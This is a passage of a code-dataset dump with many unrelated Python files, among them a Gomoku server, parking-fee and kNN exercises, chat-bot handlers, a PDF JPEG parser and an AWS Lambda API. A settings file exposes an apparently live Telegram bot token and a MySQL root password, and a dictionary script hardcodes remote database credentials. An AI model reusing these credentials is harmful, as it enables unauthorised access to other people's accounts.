1\n init_game(game)\n game.player1 = me\n my_player = game.game_player1\n await game.event.wait()\n await me.send_response(game.board.get_response())\n else:\n me.player_id = 2\n game.player2 = me\n my_player = game.game_player2\n game.event.set()\n await me.send_response(game.board.get_response())\n\n while True:\n try:\n msg = await me.receive()\n if msg.type == aiohttp.WSMsgType.text:\n data = json.loads(msg.data)\n x = int(data['x'])\n y = int(data['y'])\n response = game.board.make_move(my_player, x, y)\n if isinstance(response, GameException):\n await me.send_exception(response.exception)\n else:\n await game.player1.send_response(response)\n await game.player2.send_response(response)\n else:\n break\n except CancelledError:\n break\n return ws\n\n\ndef init_game(game):\n game.event = asyncio.Event()\n game.game_player1 = GamePlayer()\n game.game_player2 = GamePlayer()\n game.board = GomokuGameLogicManager(game.game_player1, game.game_player2)\n","sub_path":"server/communication/endpoints/game_join_endpoint.py","file_name":"game_join_endpoint.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"89169928","text":"import multiprocessing\nfrom functools import partial\nfrom contextlib import contextmanager\n\n@contextmanager\ndef poolcontext(*args, **kwargs):\n pool = multiprocessing.Pool(*args, **kwargs)\n yield pool\n pool.terminate()\n\ndef merge_names(a, b,c):\n if c==1:\n return '{} & {}'.format(a, b)\n else:\n return '{} & {}'.format(b, a)\n \nif __name__ == '__main__':\n names = ['Brown', 'Wilson', 'Bartlett', 'Rivera', 'Molloy', 'Opie']\n with poolcontext(processes=3) as pool:\n results = pool.map(partial(merge_names, b='lllllll',c=2), names)\n print(results)","sub_path":"TestM1.py","file_name":"TestM1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603857915","text":"import inspect\n\n\ndef get_all_measures():\n from measurement import measures\n\n m = []\n for name, obj in inspect.getmembers(measures):\n if inspect.isclass(obj):\n m.append(obj)\n return m\n\n\ndef guess(value, unit, measures=None):\n if measures is None:\n measures = get_all_measures()\n for measure in measures:\n try:\n return measure(**{unit: value})\n except AttributeError:\n pass\n raise ValueError(\n \"No valid measure found for %s %s; checked %s\"\n % (value, unit, \", \".join([m.__name__ for m in measures]))\n )\n","sub_path":"measurement/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55258386","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/92341\n\n\"\"\"\nfee -> 기본 시간(분), 기본 요금(원). 단위 시간(분), 단위 요금(원)\nrecords -> 시각, 차량번호, 내역 (공백으로 구분)\n\"\"\"\n\nimport math\nfrom collections import Counter\n\ndef solution(fees, records):\n default_time, default_fee, unit_time, unit_fee = fees\n \n # 차 번호 별 입출차 갯수 계산\n car_numbers = dict(Counter(map(lambda x: x.split()[1], records)))\n \n # 출차 기록이 없는 번호는 23:59 추가\n for car in car_numbers.items():\n if car[1] % 2 != 0:\n records.append(f'23:59 {car[0]} OUT')\n \n # 차량 번호, 시간, 내역 순으로 정렬\n records.sort(key=lambda x: (x.split()[1], x.split()[0], x.split()[2]))\n \n # 차량 별 누적 시간\n sum_time = {}\n for index, record in enumerate(records):\n time, car, history = record.split()\n \n # 출차 시간인 경우\n if history == \"OUT\":\n # 입차 시간\n in_time = records[index - 1].split()[0]\n sub_hour = int(time.split(':')[0]) - int(in_time.split(':')[0])\n sub_minute = int(time.split(':')[1]) - int(in_time.split(':')[1])\n \n # 실제 주차 시간\n sub_time = 60 * sub_hour + sub_minute\n \n if car in sum_time:\n sum_time[car] += sub_time\n else:\n sum_time[car] = sub_time\n \n answer = []\n for time in sum_time.values():\n # 최종 요금\n if time <= default_time:\n answer.append(default_fee)\n else:\n answer.append(default_fee + math.ceil((time - default_time) / unit_time) * unit_fee)\n \n return answer\n \nprint(solution([180, 5000, 10, 600], [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\", \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]))","sub_path":"python_/programmers/Lv.2/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"39669872","text":"'''\n@version : 1.0\n@Author : lh-13\n@Date : 2021-01-07 10:15:44\n@LastEditors : lh-13\n@LastEditTime : 2021-01-07 10:15:45\n@Descripttion : 自己实现的knn算法(k近邻)\n@FilePath : /pytorch_test/knn.py\n'''\n\n'''\n6个训练样本,分为三类,每个样本有4个特征,编号7为我们要预测的\n\n编号 花萼长度(cm) 花萼宽度(cm) 花瓣长度(cm) 花瓣宽度(cm) 名称\n1 4.9 3.1 1.5 0.1 Iris setosa\n2 5.4 3.7 1.5 0.2 Iris setosa\n3 5.2 2.7 3.9 1.4 Iris versicolor\n4 5.0 2.0 3.5 1.0 Iris versicolor\n5 6.3 2.7 4.9 1.8 Iris virginica\n6 6.7 3.3 5.7 2.1 Iris virginica\n7 5.5 2.5 4.0 1.3 ?\n'''\n\n#计算测试样本到各个训练样本的距离\n\nimport numpy as np \n\ndef CalcDistance(listA, listB):\n diff = listA - listB #减\n squareDiff = diff**2 #平方\n squareDist = np.sum(squareDiff) #和(axis=1表示行)\n distance = squareDist ** 0.5 #开根号\n\n return distance \n\n\nif __name__ == '__main__':\n testData = np.array([5.5, 2.5, 4.0, 1.3])\n print(\"Distance to 1:\", CalcDistance(np.array([4.9, 3.1, 1.5, 0.1]), testData))\n print(\"Distance to 2:\", CalcDistance(np.array([5.4, 3.7, 1.5, 0.2]), testData))\n print(\"Distance to 3:\", CalcDistance(np.array([5.2, 2.7, 3.9, 1.4]), testData))\n print(\"Distance to 4:\", CalcDistance(np.array([5.0, 2.0, 3.5, 1.0]), testData))\n print(\"Distance to 5:\", CalcDistance(np.array([6.3, 2.7, 4.9, 1.8]), testData))\n print(\"Distance to 6:\", CalcDistance(np.array([6.7, 3.3, 5.7, 2.1]), testData))\n \n\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477175095","text":"'''\nCopyright 2018 Riverstone Software, LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport argparse\nfrom os import environ\n\nfrom github import Github\n\nPARSER = argparse.ArgumentParser(\n description='''Riverstone CLI is a command line utility for Riverstone\n employees. This utility automates routinely used commands and\n procedures used at Riverstone.'''\n)\n\nSUBPARSER = PARSER.add_subparsers(dest=\"commands\")\n\nGITHUB = Github(environ.get('RSCLI_GITHUB_KEY'))\n\n\nLABELS = {\n 'RFR': 'RFR',\n 'WIP': 'WIP'\n}\n","sub_path":"riverstone_cli/common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"277186874","text":"from pathlib import Path\n\n\nTOKEN = '1891854677:AAGdDC2MEkq-EQOvwuiIdqz9Kn94xOUFHBI'\n\n# this is the src folder \nBASE_DIR = Path(__file__).resolve().parent.parent\n\nMYSQL_CONNECTION = {\n 'user': 'root',\n 'password': 'adelante5225',\n 'host': '127.0.0.1',\n 'use_pure':True,\n 'connection_timeout':1000\n}\n\nQUERIES_DIR = BASE_DIR / 'queries'\n\nVENV_FOLDERNAME = '.venv'\n\nVENV_PYTHON_PATH = (BASE_DIR.parent / VENV_FOLDERNAME / \"Scripts\" / \"python.exe\")\n\nBOTMAIN_FILENAME = 'bot_main'\n\nBOT_MAIN_PATH = BASE_DIR/f'{BOTMAIN_FILENAME}.py'\n\nREQUIREMENTS_FILENAME = 'requirements.txt'\n\nDATABASE_NAME = 'new_schema'\n\nNUMBER_OF_QUESTIONS = 5\n\nCHECK_EMOJI = \"⭕️\"\n\nNUMBER_OF_USERS_FOR_SESSION = 2","sub_path":"src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121827310","text":"import os\nimport sys\n\nimport pygame\nimport requests\n\npygame.init()\n\ncoords = [37.615560, 55.752220]\nzoom = 1\nlook = ['map', 'sat', 'sat,skl']\ncurrent_look = 0\n\ndef map_req(zoom, coords, l):\n global look\n response = None\n map_request = \"http://static-maps.yandex.ru/1.x/?ll={},{}&spn={},{}&l={}\".format(coords[0], coords[1], zoom, zoom, look[l])\n response = requests.get(map_request)\n if not response:\n print(\"Ошибка выполнения запроса:\")\n print(map_request)\n print(\"Http статус:\", response.status_code, \"(\", response.reason, \")\")\n sys.exit(1)\n map_file = \"map.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n return map_file\n\n\nm_f = map_req(zoom, coords, current_look)\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n os.remove(m_f)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_PAGEUP:\n zoom *= 1.1\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_PAGEDOWN:\n zoom /= 1.1\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_RIGHT:\n coords[0] += 0.1\n coords[0] = coords[0] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_LEFT:\n coords[0] -= 0.1\n coords[0] = coords[0] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_UP:\n coords[1] += 0.1\n coords[1] = coords[1] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_DOWN:\n coords[1] -= 0.1\n coords[1] = coords[1] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_HOME:\n current_look += 1\n current_look = current_look % 3\n m_f = map_req(zoom, coords, current_look)\n screen = pygame.display.set_mode((600, 450))\n screen.blit(pygame.image.load(m_f), (0, 0))\n pygame.display.flip()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"505506081","text":"# -*- coding: utf-8 -*-\n\n##############################\n# 基本设置\n##############################\n# 本地开发时监听的 host 和 port\nTEST_HOST = \"0.0.0.0\"\nTEST_PORT = 8080\n\n# Debug 开关\nDEBUG = False\n# Test 开关\nTESTING = False\n# 日志配置文件\nLOG_CONFIG_FILE = \"./log.conf\"\n# 模板目录名\nTEMPLATE_FOLDER = \"templates\"\n# 需要加载的模块列表\nMODULES = [\n \"webapp.core\",\n \"webapp.main\",\n]\n\n##############################\n# session 相关\n##############################\n#SESSION_TYPE = \"filesystem\"\n#SECRET_KEY = '123456'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55774556","text":"'''\nUtility functions shared between multiple flit subcommands.\n'''\n\nimport os\nimport sys\n\ndef process_in_file(infile, dest, vals, overwrite=False):\n '''\n Process a file such as 'Makefile.in' where there are variables to\n replace.\n\n @param infile: input file. Usually ends in \".in\"\n @param dest: destination file. If overwrite is False, then destination\n shouldn't exist, otherwise a warning is printed and nothing is\n done.\n @param vals: dictionary of key -> val where we search and replace {key}\n with val everywhere in the infile.\n '''\n if not overwrite and os.path.exists(dest):\n print('Warning: {0} already exists, not overwriting'.format(dest),\n file=sys.stderr)\n return\n with open(infile, 'r') as fin:\n with open(dest, 'w') as fout:\n fout.write(fin.read().format(**vals))\n\n\n","sub_path":"scripts/flitcli/flitutil.py","file_name":"flitutil.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"217625370","text":"from consts import *\nfrom helpers import get_event_for_user, user_liked_event_get_response\n\n\n'''All funcs starting with 'get_rseponse'\nreturn message, attachments and new chat_status'''\n\n\ndef get_response_just_started() -> (str, str, int):\n '''when user has just started chat'''\n message = INITIAL_MESSAGE\n attachments = ''\n new_chat_status = ChatStatuses.SELECTS_WHAT_TO_DO\n return (message, attachments, new_chat_status)\n\n\ndef get_response_seen_event(user_choice, user_id) -> (str, str, int):\n '''user has seen event and has made his choice'''\n if (not user_choice.isdigit()) or \\\n (int(user_choice) not in SEEN_EVENT_CHOICES.values()):\n # user input is invalid\n return (\n DID_NOT_GET_IT_MESSAGE,\n '',\n -1\n )\n\n else:\n user_choice = int(user_choice)\n if user_choice == SEEN_EVENT_CHOICES['Мне нравится это предложение!']:\n message, attachments = user_liked_event_get_response(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SELECTS_WHAT_TO_DO\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Покажи мне другое']:\n message, attachments = get_event_for_user(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SEEN_EVENT\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Хочу оставить заявку']:\n return (\n SEND_EVENT_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_EVENT\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Хочу оставить фидбэк']:\n return (\n SEND_FEEDBACK_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_FEEDBACK\n )\n\n\ndef get_response_selected_what_to_do(user_choice, user_id) -> (str, str, int):\n '''user has selected what to do'''\n if (not user_choice.isdigit()) or \\\n (int(user_choice) not in SELECT_WHAT_TO_DO_CHOICES.values()):\n # user input is invalid\n return (DID_NOT_GET_IT_MESSAGE, '', '')\n\n else:\n user_choice = int(user_choice)\n if user_choice == SELECT_WHAT_TO_DO_CHOICES['Смотреть заявки других']:\n message, attachments = get_event_for_user(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SEEN_EVENT\n )\n\n elif user_choice == SELECT_WHAT_TO_DO_CHOICES['Оставить заявку']:\n return (\n SEND_EVENT_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_EVENT\n )\n\n elif user_choice == SELECT_WHAT_TO_DO_CHOICES['Оставить фидбэк']:\n return (\n SEND_FEEDBACK_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_FEEDBACK\n )\n\n\ndef get_response_user_must_set_city_or_age() -> (str, str, int):\n '''call this func when user has no city or age on vk'''\n message = USER_MUST_SET_CITY_OR_AGE_MESSAGE\n attachments = ''\n new_chat_status = -1\n return (message, attachments, new_chat_status)\n","sub_path":"src/get_response.py","file_name":"get_response.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"377584908","text":"import struct\nimport traceback\nfrom io import BytesIO, BufferedReader\nfrom pathlib import Path\nfrom typing import Union\n\nImageType = Union[str, Path, BytesIO]\nclass PDFImage:\n \"\"\"Class that represents a PDF image.\n\n You can pass the location path (``str`` or ``pathlib.Path`` format) of the\n image, or pass a file-like object (``io.BytesIO``) with the image bytes, the\n extension of the image, and the image name.\n\n Only JPEG image format is supported in this moment.\n\n Args:\n image (str, pathlib.Path, BytesIO): The path or file-like object of the\n image.\n extension (str, optional): If ``image`` is path-like object, this\n argument should contain the extension of the image.\n image_name (str, optional): If ``image`` is path-like object, this\n argument should contain the name of the image. This name should be\n unique among the images added to the same PDF document.\n \"\"\"\n def __init__(\n self, image: ImageType, extension: str=None, image_name: str=None\n ):\n image_bytes = None\n try:\n if isinstance(image, str):\n image_bytes = Path(image).open('rb')\n self.image_name = image\n if extension is None:\n extension = image.rpartition('.')[-1]\n elif isinstance(image, Path):\n image_bytes = image.open('rb')\n self.image_name = str(image)\n if extension is None:\n extension = image.suffix\n elif isinstance(image, BytesIO):\n image_bytes = image\n if image_name is None:\n raise TypeError(\n 'when image is of type io.BytesIO, image_name must be '\n 'provided'\n )\n self.image_name = image_name\n if extension is None:\n raise TypeError(\n 'when image is of type io.BytesIO, extension must be '\n 'provided'\n )\n else:\n raise TypeError(\n 'image must be of type str, pathlib.Path or io.BytesIO'\n )\n\n if not isinstance(extension, str):\n raise TypeError('extension type is str')\n\n if len(extension) > 0 and extension[0] == '.':\n extension = extension[1:]\n\n extension = extension.strip().lower()\n\n if extension in ['jpg', 'jpeg']:\n self.parse_jpg(image_bytes)\n else:\n raise NotImplementedError(\n 'Images of type \"{}\" are not yet supported'.format(extension)\n )\n finally:\n if image_bytes is not None:\n image_bytes.close()\n\n def parse_jpg(self, bytes_: Union[BytesIO, BufferedReader]) -> None:\n \"\"\"Method to extract metadata from a JPEG image ``bytes_`` needed to\n embed this image in a PDF document.\n\n This method creates this instance's attibute ``pdf_obj``, containing\n a dict that can be added to a :class:`pdfme.base.PDFBase` instance as\n a PDF Stream object that represents this image.\n\n Args:\n bytes_ (BytesIO, BufferedReader): A file-like object containing the\n image.\n \"\"\"\n try:\n while True:\n markerHigh, markerLow = struct.unpack('BB', bytes_.read(2))\n if markerHigh != 0xFF or markerLow < 0xC0:\n raise SyntaxError('No JPEG marker found')\n elif markerLow == 0xDA: # SOS\n raise SyntaxError('No JPEG SOF marker found')\n elif (markerLow == 0xC8 or # JPG\n (markerLow >= 0xD0 and markerLow <= 0xD9) or # RSTx\n (markerLow >= 0xF0 and markerLow <= 0xFD)): # JPGx\n continue\n else:\n data_size, = struct.unpack('>H', bytes_.read(2))\n data = bytes_.read(data_size - 2) if data_size > 2 else ''\n if (\n (markerLow >= 0xC0 and markerLow <= 0xC3) or #SOF0-SOF3\n (markerLow >= 0xC5 and markerLow <= 0xC7) or #SOF4-SOF7\n (markerLow >= 0xC9 and markerLow <= 0xCB) or #SOF9-SOF11\n (markerLow >= 0xCD and markerLow <= 0xCF) #SOF13-SOF15\n ):\n depth, h, w, layers = struct.unpack_from('>BHHB', data)\n\n if layers == 3: colspace = b'/DeviceRGB'\n elif layers == 4: colspace = b'/DeviceCMYK'\n else: colspace = b'/DeviceGray'\n\n break\n except Exception:\n traceback.print_exc()\n raise ValueError(\n \"Couldn't process image: {}\".format(self.image_name)\n )\n\n bytes_.seek(0)\n image_data = bytes_.read()\n bytes_.close()\n\n self.width = int(w)\n self.height = int(h)\n\n self.pdf_obj = {\n 'Type': b'/XObject',\n 'Subtype': b'/Image',\n 'Width': self.width,\n 'Height': self.height,\n 'ColorSpace': colspace,\n 'BitsPerComponent': int(depth),\n 'Filter': b'/DCTDecode',\n '__skip_filter__': True,\n '__stream__': image_data\n }\n\n","sub_path":"pdfme/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54420504","text":"import json\nimport os\nimport decimal\n\nTABLE_NAME = os.environ.get('TABLE_NAME', 'undefined table')\n\ndef get_table(context):\n\tif context and hasattr(context, 'table'):\n\t\treturn context.table\n\timport boto3\n\treturn boto3.resource('dynamodb').Table(TABLE_NAME)\n\nclass BotoEncoder(json.JSONEncoder):\n\tdef default(self, o):\n\t\tif isinstance(o, decimal.Decimal):\n\t\t\tif o % 1 > 0:\n\t\t\t\treturn float(o)\n\t\t\telse:\n\t\t\t\treturn int(o)\n\t\tif isinstance(o, set):\n\t\t\treturn list(o)\n\t\treturn super(BotoEncoder, self).default(o)\n\ndef to_json(content):\n\treturn json.dumps(content, cls=BotoEncoder)\n\ndef get_route(event):\n\treturn {\n\t\t'health_check' : health_check,\n\t\t'get_wall_count' : get_wall_count,\n\t\t'create_wall' : create_wall,\n\t\t'get_wall_content' : get_wall_content,\n\t\t'put_wall_content' : put_wall_content,\n\t}.get(__get_operation_name(event))\n\n\ndef routing(event, context, get_route_function=None):\n\troute = (get_route_function or get_route)(event)\n\tif route:\n\t\treturn route(event, context)\n\n\treturn {\n\t\t'statusCode': 404,\n\t\t'body': 'Unknown operation %s.' % (__get_operation_name(event)),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef health_check(event, context):\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json('Alive'),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef get_wall_count(event, context):\n\ttable = get_table(context)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(str(table.item_count) + ' elements in the table.'),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef create_wall(event, context): \n\ttable = get_table(context)\n\twall_id = __get_wall_id(event)\n\tresult = table.put_item(\n\t\tItem={\n\t\t\t'wall_id' : wall_id\n\t\t}\n\t)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef get_wall_content(event, context): \n\ttable = get_table(context)\n\twall_id = __get_wall_id(event)\n\tresult = table.get_item(\n\t\tKey={\n\t\t\t'wall_id': wall_id\n\t\t},\n\t\tAttributesToGet=[\n\t\t\t'content',\n\t\t]\n\t)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result.get('Item', {}).get('content', {})),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef put_wall_content(event, context): \n\ttable = get_table(context)\n\n\twall_id = __get_wall_id(event)\n\tcontent = json.loads(event['body'], parse_float=decimal.Decimal)\n\t\n\tresult = table.update_item(\n\t\tKey={\n\t\t\t'wall_id': wall_id\n\t\t},\n\t\tAttributeUpdates={\n\t\t\t'content': {\n\t\t\t\t'Value': content\n\t\t\t}\n\t\t}\n\t)\n\t\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef __get_operation_name(event):\n\treturn event.get('requestContext', {}).get('operationName', None)\n\ndef __get_wall_id(event):\n\treturn event.get('pathParameters', {}).get('wall_id', None)","sub_path":"lambda/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351770264","text":"import random\nimport argparse\nimport os\nno_plot = False\ntry:\n import numpy as np\n from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n no_plot = True\n\n\n'''\nInput: File with repeats downloaded from Pfam database. \nIMPORTANT: \n Format: FASTA\n Gaps: Gaps as \"-\" (dashes)\n'''\n\n\n# -------------------------------------------------------------------\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-F\", help='File name')\nparser.add_argument(\"-P\", help='Plot', action='store_true')\nparser.add_argument(\"-M\", help='Multi (more than 2)', action='store_true')\n\nargs = parser.parse_args()\n\n\n# -------------------------------------------------------------------\nfile_length = 0\nif args.F:\n filename = args.F\n if '.' in filename:\n filename = filename.split(\".\")[0]\n num_lines = sum(1 for line in open(f'{filename}.txt'))\n\n# -------------------------------------------------------------------\nwith open(f'{filename}.txt') as file_line:\n maxi = 0\n temp_seq = ''\n sequences = []\n names = []\n values_start = []\n values_end = []\n for i in range(num_lines):\n dana_linia = file_line.readline()\n dana_linia = dana_linia.rstrip()\n if '>' in dana_linia:\n if temp_seq:\n sequences.append(temp_seq)\n temp_seq = ''\n temp = dana_linia.lstrip('>')\n names.append(temp.split('/')[0])\n values_start.append(int(temp.split('/')[1].split('-')[0]))\n values_end.append(int(temp.split('/')[1].split('-')[1]))\n if int(int(temp.split('/')[1].split('-')[1])) > maxi:\n maxi = int(int(temp.split('/')[1].split('-')[1]))\n else:\n temp_seq += dana_linia\n sequences.append(temp_seq)\n\nif not args.P:\n summary = {}\n # # # {name: [[start, end, id, seq], [start, end, id, seq]]} - sort by start position\n for i in range(len(names)):\n if names[i] not in summary:\n temp_list = [[values_start[i], values_end[i], i, sequences[i]]]\n for i1 in range(i + 1, len(names)):\n if names[i] == names[i1]:\n temp_list.append([values_start[i1], values_end[i1], i1, sequences[i1]])\n temp_list.sort(key=lambda i: i[0])\n summary[names[i]] = temp_list\n\n# # # maxcount = 8 (Tyle maksymalnie powtórzeń o tej samej nazwie)\n\n# -----------------------------------------------------------------------\nif args.P:\n if no_plot:\n print('No module Matplotlib, see Readme for more info!')\n exit()\n else:\n x_ticks = np.arange(1, maxi, 400)\n starts_y_axis = [random.random() for i in range(len(values_start))]\n ends_y_axis = [random.random() + 2 for i in range(len(values_end))]\n plt.figure(figsize=(12, 3))\n plt.scatter(values_start, starts_y_axis, s=0.2)\n plt.scatter(values_end, ends_y_axis, s=0.2)\n plt.yticks([0.5, 2.5], ['start', 'end'])\n plt.xticks(x_ticks)\n plt.show()\n\n# -----------------------------------------------------------------------\nif not args.P:\n if args.M:\n max_counts = len(summary[max(summary, key=lambda i: len(summary[i]))])\n for i in range(max_counts+1):\n if i != 0:\n list_of_files = [f'{filename}_{i}_{chr(65 + i1)}.txt' for i1 in range(i)]\n list_of_files2 = []\n for i2 in list_of_files:\n if '/' in i2:\n list_of_files2.append(i2.split('/')[-1])\n list_of_files = list_of_files2\n opened_files = [open(f'files_from_separate_Pfam_to_counts/{i2}', 'w') for i2 in list_of_files]\n for i2 in summary:\n if len(summary[i2]) == i:\n for i3 in range(i):\n opened_files[i3].write(f'>{i2}/{summary[i2][i3][0]}-{summary[i2][i3][1]}\\n')\n opened_files[i3].write(f'{summary[i2][i3][3]}\\n')\n for i4 in opened_files:\n i4.close()\n else:\n if '/' in filename:\n filename = filename.split('/')[-1]\n A_part = open(f'files_from_separate_Pfam_to_counts/{filename}_2_A.txt', 'w')\n B_part = open(f'files_from_separate_Pfam_to_counts/{filename}_2_B.txt', 'w')\n for i in summary:\n if len(summary[i]) == 2:\n A_part.write(f'>{i}/{summary[i][0][0]}-{summary[i][0][1]}\\n')\n A_part.write(f'{summary[i][0][3]}\\n')\n B_part.write(f'>{i}/{summary[i][1][0]}-{summary[i][1][1]}\\n')\n B_part.write(f'{summary[i][1][3]}\\n')\n\n","sub_path":"separate_Pfam_to_counts.py","file_name":"separate_Pfam_to_counts.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260701076","text":"#!/usr/local/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport cv2\n\nimg = cv2.imread('bat.jpg')\nblurred = cv2.GaussianBlur(img, (3, 3), 0)\ngray_image = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Frame\", gray_image)\nret,thresh1 = cv2.threshold(gray_image,127,255,cv2.THRESH_BINARY)\nv = np.median(blurred)\nlower = int(max(0, (1.0 - 0.33) * v))\nupper = int(min(255, (1.0 + 0.33) * v))\nedges = cv2.Canny(blurred, lower, upper)\n\n\n\n_, contours, _ = cv2.findContours(edges, 1, 2)\ncnt = contours[0]\n\nrect = cv2.minAreaRect(cnt)\nbox = cv2.boxPoints(rect)\nbox = np.int0(box)\ncv2.drawContours(edges,[box],0,(0,0,255),2)\ncv2.imshow(\"Frame\", thresh1)\nkey = cv2.waitKey(1) & 0xFF\nraw_input()","sub_path":"bat.py","file_name":"bat.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584294721","text":"import mysql.connector\nfrom difflib import get_close_matches\nimport json\n\ndata = json.load(open(\"../files/data.json\"))\n\n\ncon = mysql.connector.connect(\n user = \"ardit700_student\",\n password = \"ardit700_student\",\n host = \"108.167.140.122\",\n database = \"ardit700_pm1database\"\n)\n\ncursor = con.cursor()\n\n\ndef define(word):\n # query = cursor.execute(\"SELECT Definition FROM Dictionary WHERE Expression = '%s'\" % word)\n query = cursor.execute(f\"SELECT Definition FROM Dictionary WHERE Expression = '{word}'\")\n results = cursor.fetchall()\n if results:\n for result in results:\n print(result[0])\n elif len(get_close_matches(word, data.keys())) > 0:\n # yn = input(\"Did you mean %s instead (y/n): \" % get_close_matches(w, data.keys())[0])\n yn = input(f\"Did you mean {get_close_matches(word, data.keys())[0]} instead? Enter Y if yes, or N if no: \")\n if yn == \"y\":\n print(data[get_close_matches(word, data.keys())[0]])\n elif yn == \"n\":\n print(\"The word doesn't exist. Please double check it.\")\n else:\n print(\"We didn't understand your entry.\")\n else:\n print(\"No word found!\")\n\nword = input(\"Enter the word: \")\nword = word.lower()\noutput = define(word)\nif type(output) == list:\n for item in output:\n print(item)\nelse:\n print(output)\n\n","sub_path":"sec_14_mysql/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551481194","text":"import numpy as np\n\nHIDDEN_DIM = 4\n\nclass Sigmoid:\n # DO NOT DELETE\n def __init__(self):\n pass\n def forward(self, x):\n self.res = 1/(1+np.exp(-x))\n return self.res\n def backward(self):\n return self.res * (1-self.res)\n def __call__(self, x):\n return self.forward(x)\n\n\nclass Tanh:\n # DO NOT DELETE\n def __init__(self):\n pass\n def forward(self, x):\n self.res = np.tanh(x)\n return self.res\n def backward(self):\n return 1 - (self.res**2)\n def __call__(self, x):\n return self.forward(x)\n\nclass Linear():\n # DO NOT 